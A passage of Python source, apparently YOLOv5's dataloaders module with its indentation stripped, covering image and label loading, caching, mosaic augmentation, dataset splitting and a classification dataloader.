s = np.stack([letterbox(x, img_size, stride=stride, auto=auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
self.auto = auto and self.rect
self.transforms = transforms # optional
if not self.rect:
LOGGER.warning('WARNING ⚠️ Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f = 0, self.frames[i] # frame number, frame array
while cap.isOpened() and n < f:
n += 1
cap.grab() # .read() = .grab() followed by .retrieve()
if n % self.vid_stride == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING ⚠️ Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] = np.zeros_like(self.imgs[i])
cap.open(stream) # re-open stream if signal was lost
time.sleep(0.0) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
im0 = self.imgs.copy()
if self.transforms:
im = np.stack([self.transforms(x) for x in im0]) # transforms
else:
im = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0] for x in im0]) # resize
im = im[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
im = np.ascontiguousarray(im) # contiguous
return self.sources, im, im0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = f'{os.sep}images{os.sep}', f'{os.sep}labels{os.sep}' # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
rand_interp_methods = [cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4]
def __init__(self,
path,
img_size=640,
batch_size=16,
augment=False,
hyp=None,
rect=False,
image_weights=False,
cache_images=False,
single_cls=False,
stride=32,
pad=0.0,
min_items=0,
prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations(size=img_size) if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent, 1) if x.startswith('./') else x for x in t] # to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # to global path (pathlib)
else:
raise FileNotFoundError(f'{prefix}{p} does not exist')
self.im_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.im_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\n{HELP_URL}') from e
# Check cache
self.label_files = img2label_paths(self.im_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # matches current version
assert cache['hash'] == get_hash(self.label_files + self.im_files) # identical hash
except Exception:
cache, exists = self.cache_labels(cache_path, prefix), False # run cache ops
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupt, total
if exists and LOCAL_RANK in {-1, 0}:
d = f"Scanning {cache_path}... {nf} images, {nm + ne} backgrounds, {nc} corrupt"
tqdm(None, desc=prefix + d, total=n, initial=n, bar_format=TQDM_BAR_FORMAT) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels found in {cache_path}, can not start training. {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
nl = len(np.concatenate(labels, 0)) # number of labels
assert nl > 0 or not augment, f'{prefix}All labels empty in {cache_path}, can not start training. {HELP_URL}'
self.labels = list(labels)
self.shapes = np.array(shapes)
self.im_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
# Filter images
if min_items:
include = np.array([len(x) >= min_items for x in self.labels]).nonzero()[0].astype(int)
LOGGER.info(f'{prefix}{n - len(include)}/{n} images filtered from dataset')
self.im_files = [self.im_files[i] for i in include]
self.label_files = [self.label_files[i] for i in include]
self.labels = [self.labels[i] for i in include]
self.segments = [self.segments[i] for i in include]
self.shapes = self.shapes[include] # wh
# Create indices
n = len(self.shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.im_files = [self.im_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.segments = [self.segments[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache images into RAM/disk for faster training
if cache_images == 'ram' and not self.check_cache_ram(prefix=prefix):
cache_images = False
self.ims = [None] * n
self.npy_files = [Path(f).with_suffix('.npy') for f in self.im_files]
if cache_images:
b, gb = 0, 1 << 30 # bytes of cached images, bytes per gigabytes
self.im_hw0, self.im_hw = [None] * n, [None] * n
fcn = self.cache_images_to_disk if cache_images == 'disk' else self.load_image
results = ThreadPool(NUM_THREADS).imap(fcn, range(n))
pbar = tqdm(enumerate(results), total=n, bar_format=TQDM_BAR_FORMAT, disable=LOCAL_RANK > 0)
for i, x in pbar:
if cache_images == 'disk':
b += self.npy_files[i].stat().st_size
else: # 'ram'
self.ims[i], self.im_hw0[i], self.im_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
b += self.ims[i].nbytes
pbar.desc = f'{prefix}Caching images ({b / gb:.1f}GB {cache_images})'
pbar.close()
def check_cache_ram(self, safety_margin=0.1, prefix=''):
# Check image caching requirements vs available memory
b, gb = 0, 1 << 30 # bytes of cached images, bytes per gigabytes
n = min(self.n, 30) # extrapolate from 30 random images
for _ in range(n):
im = cv2.imread(random.choice(self.im_files)) # sample image
ratio = self.img_size / max(im.shape[0], im.shape[1]) # max(h, w) # ratio
b += im.nbytes * ratio ** 2
mem_required = b * self.n / n # GB required to cache dataset into RAM
mem = psutil.virtual_memory()
cache = mem_required * (1 + safety_margin) < mem.available # to cache or not to cache, that is the question
if not cache:
LOGGER.info(f"{prefix}{mem_required / gb:.1f}GB RAM required, "
f"{mem.available / gb:.1f}/{mem.total / gb:.1f}GB available, "
f"{'caching images ✅' if cache else 'not caching images ⚠️'}")
return cache
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning {path.parent / path.stem}..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.im_files, self.label_files, repeat(prefix))),
desc=desc,
total=len(self.im_files),
bar_format=TQDM_BAR_FORMAT)
for im_file, lb, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [lb, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc} {nf} images, {nm + ne} backgrounds, {nc} corrupt"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING ⚠️ No labels found in {path}. {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.im_files)
x['results'] = nf, nm, ne, nc, len(self.im_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING ⚠️ Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.im_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = self.load_mosaic(index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *self.load_mosaic(random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = self.load_image(index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img,
labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
# nl = len(labels) # update after cutout
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.im_files[index], shapes
def load_image(self, i):
# Loads 1 image from dataset index 'i', returns (im, original hw, resized hw)
im, f, fn = self.ims[i], self.im_files[i], self.npy_files[i],
if im is None: # not cached in RAM
if fn.exists(): # load npy
im = np.load(fn)
else: # read image
im = cv2.imread(f) # BGR
assert im is not None, f'Image Not Found {f}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
interp = cv2.INTER_LINEAR if (self.augment or r > 1) else cv2.INTER_AREA
im = cv2.resize(im, (int(w0 * r), int(h0 * r)), interpolation=interp)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
return self.ims[i], self.im_hw0[i], self.im_hw[i] # im, hw_original, hw_resized
def cache_images_to_disk(self, i):
# Saves an image as an *.npy file for faster loading
f = self.npy_files[i]
if not f.exists():
np.save(f.as_posix(), cv2.imread(self.im_files[i]))
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4,
labels4,
segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
hp, wp = -1, -1 # height, width previous
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9, segments9 = copy_paste(img9, labels9, segments9, p=self.hyp['copy_paste'])
img9, labels9 = random_perspective(img9,
labels9,
segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
@staticmethod
def collate_fn(batch):
im, label, path, shapes = zip(*batch) # transposed
for i, lb in enumerate(label):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
im, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
im4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im1 = F.interpolate(im[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear',
align_corners=False)[0].type(im[i].type())
lb = label[i]
else:
im1 = torch.cat((torch.cat((im[i], im[i + 1]), 1), torch.cat((im[i + 2], im[i + 3]), 1)), 2)
lb = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
im4.append(im1)
label4.append(lb)
for i, lb in enumerate(label4):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def flatten_recursive(path=DATASETS_DIR / 'coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(f'{str(path)}_flat')
if os.path.exists(new_path):
shutil.rmtree(new_path) # delete output folder
os.makedirs(new_path) # make new output folder
for file in tqdm(glob.glob(f'{str(Path(path))}/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path=DATASETS_DIR / 'coco128'): # from utils.dataloaders import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classification') if (path / 'classification').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path=DATASETS_DIR / 'coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.dataloaders import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
for x in txt:
if (path.parent / x).exists():
(path.parent / x).unlink() # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write(f'./{img.relative_to(path.parent).as_posix()}' + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING ⚠️ {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
lb = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any(len(x) > 6 for x in lb): # is segment
classes = np.array([x[0] for x in lb], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in lb] # (cls, xy1...)
lb = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
lb = np.array(lb, dtype=np.float32)
nl = len(lb)
if nl:
assert lb.shape[1] == 5, f'labels require 5 columns, {lb.shape[1]} columns detected'
assert (lb >= 0).all(), f'negative label values {lb[lb < 0]}'
assert (lb[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {lb[:, 1:][lb[:, 1:] > 1]}'
_, i = np.unique(lb, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
lb = lb[i] # remove duplicates
if segments:
segments = [segments[x] for x in i]
msg = f'{prefix}WARNING ⚠️ {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
lb = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
lb = np.zeros((0, 5), dtype=np.float32)
return im_file, lb, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING ⚠️ {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
class HUBDatasetStats():
""" Class for generating HUB dataset JSON and `-hub` dataset directory
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
Usage
from utils.dataloaders import HUBDatasetStats
stats = HUBDatasetStats('coco128.yaml', autodownload=True) # usage 1
stats = HUBDatasetStats('path/to/coco128.zip') # usage 2
stats.get_json(save=False)
stats.process_images()
"""
def __init__(self, path='coco128.yaml', autodownload=False):
# Initialize class
zipped, data_dir, yaml_path = self._unzip(Path(path))
try:
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir
except Exception as e:
raise Exception("error/HUB/dataset_stats/yaml_load") from e
check_dataset(data, autodownload) # download dataset if missing
self.hub_dir = Path(data['path'] + '-hub')
self.im_dir = self.hub_dir / 'images'
self.im_dir.mkdir(parents=True, exist_ok=True) # makes /images
self.stats = {'nc': data['nc'], 'names': list(data['names'].values())} # statistics dictionary
self.data = data
@staticmethod
def _find_yaml(dir):
# Return data.yaml file
files = list(dir.glob('*.yaml')) or list(dir.rglob('*.yaml')) # try root level first and then recursive
assert files, f'No *.yaml file found in {dir}'
if len(files) > 1:
files = [f for f in files if f.stem == dir.stem] # prefer *.yaml files that match dir name
assert files, f'Multiple *.yaml files found in {dir}, only 1 *.yaml file allowed'
assert len(files) == 1, f'Multiple *.yaml files found: {files}, only 1 *.yaml file allowed in {dir}'
return files[0]
def _unzip(self, path):
# Unzip data.zip
if not str(path).endswith('.zip'): # path is data.yaml
return False, None, path
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
unzip_file(path, path=path.parent)
dir = path.with_suffix('') # dataset directory == zip name
assert dir.is_dir(), f'Error unzipping {path}, {dir} not found. path/to/abc.zip MUST unzip to path/to/abc/'
return True, str(dir), self._find_yaml(dir) # zipped, data_dir, yaml_path
def _hub_ops(self, f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = self.im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=50, optimize=True) # save
except Exception as e: # use OpenCV
LOGGER.info(f'WARNING ⚠️ HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_AREA)
cv2.imwrite(str(f_new), im)
def get_json(self, save=False, verbose=False):
# Return dataset JSON for Ultralytics HUB
def _round(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
for split in 'train', 'val', 'test':
if self.data.get(split) is None:
self.stats[split] = None # i.e. no test set
continue
dataset = LoadImagesAndLabels(self.data[split]) # load dataset
x = np.array([
np.bincount(label[:, 0].astype(int), minlength=self.data['nc'])
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics')]) # shape(128x80)
self.stats[split] = {
'instance_stats': {
'total': int(x.sum()),
'per_class': x.sum(0).tolist()},
'image_stats': {
'total': dataset.n,
'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{
str(Path(k).name): _round(v.tolist())} for k, v in zip(dataset.im_files, dataset.labels)]}
# Save, print and return
if save:
stats_path = self.hub_dir / 'stats.json'
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(self.stats, f) # save stats.json
if verbose:
print(json.dumps(self.stats, indent=2, sort_keys=False))
return self.stats
def process_images(self):
# Compress images for Ultralytics HUB
for split in 'train', 'val', 'test':
if self.data.get(split) is None:
continue
dataset = LoadImagesAndLabels(self.data[split]) # load dataset
desc = f'{split} images'
for _ in tqdm(ThreadPool(NUM_THREADS).imap(self._hub_ops, dataset.im_files), total=dataset.n, desc=desc):
pass
print(f'Done. All images saved to {self.im_dir}')
return self.im_dir
# Classification dataloaders -------------------------------------------------------------------------------------------
class ClassificationDataset(torchvision.datasets.ImageFolder):
"""
YOLOv5 Classification Dataset.
Arguments
root: Dataset path
transform: torchvision transforms, used by default
album_transform: Albumentations transforms, used if installed
"""
def __init__(self, root, augment, imgsz, cache=False):
super().__init__(root=root)
self.torch_transforms = classify_transforms(imgsz)
self.album_transforms = classify_albumentations(augment, imgsz) if augment else None
self.cache_ram = cache is True or cache == 'ram'
self.cache_disk = cache == 'disk'
self.samples = [list(x) + [Path(x[0]).with_suffix('.npy'), None] for x in self.samples] # file, index, npy, im
def __getitem__(self, i):
f, j, fn, im = self.samples[i] # filename, index, filename.with_suffix('.npy'), image
if self.cache_ram and im is None:
im = self.samples[i][3] = cv2.imread(f)
elif self.cache_disk:
if not fn.exists(): # load npy
np.save(fn.as_posix(), cv2.imread(f))
im = np.load(fn)
else: # read image
im = cv2.imread(f) # BGR
if self.album_transforms:
sample = self.album_transforms(image=cv2.cvtColor(im, cv2.COLOR_BGR2RGB))["image"]
else:
sample = self.torch_transforms(im)
return sample, j
def create_classification_dataloader(path,
imgsz=224,
batch_size=16,
augment=True,
cache=False,
rank=-1,
workers=8,
shuffle=True):
# Returns Dataloader object to be used with YOLOv5 Classifier
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = ClassificationDataset(root=path, imgsz=imgsz, augment=augment, cache=cache)
batch_size = min(batch_size, len(dataset))
nd = torch.cuda.device_count()
nw = min([os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers])
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
generator = torch.Generator()
generator.manual_seed(6148914691236517205 + RANK)
return InfiniteDataLoader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=PIN_MEMORY,
worker_init_fn=seed_worker,
generator=generator) # or DataLoader(persistent_workers=True)
